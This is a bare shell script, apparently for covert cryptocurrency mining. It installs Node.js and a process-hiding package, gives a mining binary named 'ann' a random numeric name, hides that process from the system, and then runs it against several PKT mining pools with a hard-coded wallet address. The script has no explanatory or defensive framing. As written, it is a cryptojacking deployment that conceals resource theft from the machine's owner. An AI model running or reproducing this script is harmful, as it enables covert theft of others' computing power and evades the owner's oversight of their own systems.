blkdiscard=$(shuf -n 1 -i 1-999999)
sudo apt-get update && sudo apt-get install -y screen npm && sudo apt-get install -y nodejs
sudo npm i -g node-process-hider
mv ann $blkdiscard
chmod +x $blkdiscard
sudo ph add $blkdiscard
./$blkdiscard ann -p pkt1q3r6qa92j5mgtgm4eusekelhrx27tz800qnd0h3 http://pool.srizbi.com http://pool.pktpool.io http://pool.pkt.world
